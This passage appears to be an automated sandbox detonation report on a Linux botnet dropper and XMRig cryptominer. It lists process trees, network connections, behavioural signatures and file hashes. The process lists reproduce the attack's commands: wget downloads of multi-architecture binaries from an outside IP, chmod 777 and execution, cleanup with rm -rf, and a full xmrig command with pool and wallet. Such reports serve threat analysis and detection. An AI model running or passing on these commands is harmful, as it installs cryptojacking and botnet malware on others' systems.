[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]
Network
| Country | Destination | Domain | Proto |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| US | 1.1.1.1:53 | github.com | udp |
Files
/tmp/bots
| MD5 | 2615e32f9e7b42b36ba1f3dd6f8f7e3c |
| SHA1 | 4286d999a1a76da1e68cb227e01de237ef5fcf68 |
| SHA256 | e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078 |
| SHA512 | b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 04:09
Reported
2024-11-09 04:11
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
95s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/bots | /tmp/bots | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.mips | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.mips | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/tyo2831qq.mips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tyo2831qq.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bots | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm7 | /usr/bin/wget | N/A |
Processes
/tmp/tyo2831qq.sh
[/tmp/tyo2831qq.sh]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mips]
/bin/chmod
[chmod 777 tyo2831qq.mips]
/tmp/tyo2831qq.mips
[./tyo2831qq.mips]
/usr/bin/wget
[wget http://31.172.80.237/bots]
/bin/chmod
[chmod 777 bots]
/tmp/bots
[./bots]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mpsl]
/bin/chmod
[chmod 777 tyo2831qq.mpsl]
/tmp/tyo2831qq.mpsl
[./tyo2831qq.mpsl]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.sh4]
/bin/chmod
[chmod 777 tyo2831qq.sh4]
/tmp/tyo2831qq.sh4
[./tyo2831qq.sh4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x86]
/bin/chmod
[chmod 777 tyo2831qq.x86]
/tmp/tyo2831qq.x86
[./tyo2831qq.x86]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm6]
/bin/chmod
[chmod 777 tyo2831qq.arm6]
/tmp/tyo2831qq.arm6
[./tyo2831qq.arm6]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x32]
/bin/chmod
[chmod 777 tyo2831qq.x32]
/tmp/tyo2831qq.x32
[./tyo2831qq.x32]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.ppc]
/bin/chmod
[chmod 777 tyo2831qq.ppc]
/tmp/tyo2831qq.ppc
[./tyo2831qq.ppc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.i586]
/bin/chmod
[chmod 777 tyo2831qq.i586]
/tmp/tyo2831qq.i586
[./tyo2831qq.i586]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.m68k]
/bin/chmod
[chmod 777 tyo2831qq.m68k]
/tmp/tyo2831qq.m68k
[./tyo2831qq.m68k]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.spc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm7]
/bin/chmod
[chmod 777 tyo2831qq.arm7]
/tmp/tyo2831qq.arm7
[./tyo2831qq.arm7]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm5]
/bin/rm
[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]
/usr/bin/wget
[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]
/bin/chmod
[chmod 777 xmrig]
/tmp/xmrig
[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]
Network
| Country | Destination | Domain | Proto |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
/tmp/bots
| MD5 | 2615e32f9e7b42b36ba1f3dd6f8f7e3c |
| SHA1 | 4286d999a1a76da1e68cb227e01de237ef5fcf68 |
| SHA256 | e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078 |
| SHA512 | b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 04:09
Reported
2024-11-09 04:11
Platform
debian9-mipsel-20240418-en
Max time kernel
95s
Max time network
96s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Xmrig_linux family
xmrig
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/bots | /tmp/bots | N/A |
| N/A | /tmp/xmrig | /tmp/xmrig | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.mpsl | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.mpsl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/tyo2831qq.mips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/bots | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/xmrig | /usr/bin/wget | N/A |
Processes
/tmp/tyo2831qq.sh
[/tmp/tyo2831qq.sh]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mips]
/bin/chmod
[chmod 777 tyo2831qq.mips]
/tmp/tyo2831qq.mips
[./tyo2831qq.mips]
/usr/bin/wget
[wget http://31.172.80.237/bots]
/bin/chmod
[chmod 777 bots]
/tmp/bots
[./bots]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mpsl]
/bin/chmod
[chmod 777 tyo2831qq.mpsl]
/tmp/tyo2831qq.mpsl
[./tyo2831qq.mpsl]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.sh4]
/bin/chmod
[chmod 777 tyo2831qq.sh4]
/tmp/tyo2831qq.sh4
[./tyo2831qq.sh4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x86]
/bin/chmod
[chmod 777 tyo2831qq.x86]
/tmp/tyo2831qq.x86
[./tyo2831qq.x86]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm6]
/bin/chmod
[chmod 777 tyo2831qq.arm6]
/tmp/tyo2831qq.arm6
[./tyo2831qq.arm6]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x32]
/bin/chmod
[chmod 777 tyo2831qq.x32]
/tmp/tyo2831qq.x32
[./tyo2831qq.x32]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.ppc]
/bin/chmod
[chmod 777 tyo2831qq.ppc]
/tmp/tyo2831qq.ppc
[./tyo2831qq.ppc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.i586]
/bin/chmod
[chmod 777 tyo2831qq.i586]
/tmp/tyo2831qq.i586
[./tyo2831qq.i586]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.m68k]
/bin/chmod
[chmod 777 tyo2831qq.m68k]
/tmp/tyo2831qq.m68k
[./tyo2831qq.m68k]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.spc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm7]
/bin/chmod
[chmod 777 tyo2831qq.arm7]
/tmp/tyo2831qq.arm7
[./tyo2831qq.arm7]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm5]
/bin/rm
[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]
/usr/bin/wget
[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]
/bin/chmod
[chmod 777 xmrig]
/tmp/xmrig
[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]
Network
| Country | Destination | Domain | Proto |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 1.1.1.1:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
Files
/tmp/bots
| MD5 | 2615e32f9e7b42b36ba1f3dd6f8f7e3c |
| SHA1 | 4286d999a1a76da1e68cb227e01de237ef5fcf68 |
| SHA256 | e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078 |
| SHA512 | b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78 |
/tmp/xmrig
| MD5 | 49fde861072798623bf35de4794f7d3d |
| SHA1 | 1c9b225d3e34db9c2a0fecb9f2c254da1371f953 |
| SHA256 | 8268144d8232fc0dae86c2536eef50916e4ee9a23b15a561aa72971714359383 |
| SHA512 | 14393a6a7f9103340338e74457c6f95eb7180d2a90b87e01945be621a0d0798c05fdfb08ec3dbc2ca61ee2cbb6299b48e8b27c01b00913b5e5e9ed704318ac22 |
/root/.wget-hsts
| MD5 | 5e330d55bb520266447b86c2c47fdc0f |
| SHA1 | 28e862fa757fba4f7dca7fbeac6433b1bdf75ca7 |
| SHA256 | ea7045dc1e2dd6c47941880d671c5ba8536a20728965c362881e7fee0fb3d1b2 |
| SHA512 | 8232b08e80b64a8fe7b46140e9ad7a170a06a66e59a6f728b9fda80531033d2ebe0fe68c0dde05a0e832d96c8817678e1ae27a8729a7e6d0c23ad06c8b9a6262 |